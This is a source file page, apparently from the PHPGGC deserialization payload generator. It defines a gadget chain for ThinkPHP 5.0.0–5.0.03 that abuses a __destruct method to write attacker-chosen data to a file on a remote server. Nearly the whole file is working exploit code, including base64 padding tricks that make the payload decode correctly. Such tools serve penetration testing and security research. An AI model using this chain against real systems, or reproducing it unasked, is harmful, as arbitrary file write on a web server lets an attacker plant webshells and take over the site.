Codebase list phpggc / 4b920f57-28c2-4330-9409-d5dd1e4740dd/main gadgetchains / ThinkPHP / FW / 2 / chain.php
4b920f57-28c2-4330-9409-d5dd1e4740dd/main

Tree @4b920f57-28c2-4330-9409-d5dd1e4740dd/main (Download .tar.gz)

chain.php @4b920f57-28c2-4330-9409-d5dd1e4740dd/mainraw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php

namespace GadgetChain\ThinkPHP;

class FW2 extends \PHPGGC\GadgetChain\FileWrite
{
    public static $version = '5.0.0-5.0.03';
    public static $vector = '__destruct';
    public static $author = 'zcy2018';
    public static $information = '
        We do not have full control of the path. Also, the path will turn to
        a long hex value(md5). Your file path will be REMOTE_PATH/3b58a9545013e88c7186db11bb158c44.php.
        Tested on Windows with php7.3.4 and apache2.4.39.
    ';
    
    public function generate(array $parameters)
    {
        # The payload string will get serialized before it gets written to the
        # base64-decode stream, so we need to be careful about the length.
        # e.g. s:100:"AAAA...."; will not decode the same as s:10:"AAA...";
        $path = $parameters['remote_path'];
        $data = base64_encode($parameters['data']);
        $data = preg_replace('/=/','+', $data);

        $length = strlen('<query>' . $data . '</query>');
        
        if($length > 100000)
            throw new \PHPGGC\Exception('Payload too big !');
        
        $log = (int) log10($length);
        $prefix = str_repeat('A', 4 - $log);
        $data = $prefix . $data;

        return new \think\Process($path, $data);
    }
}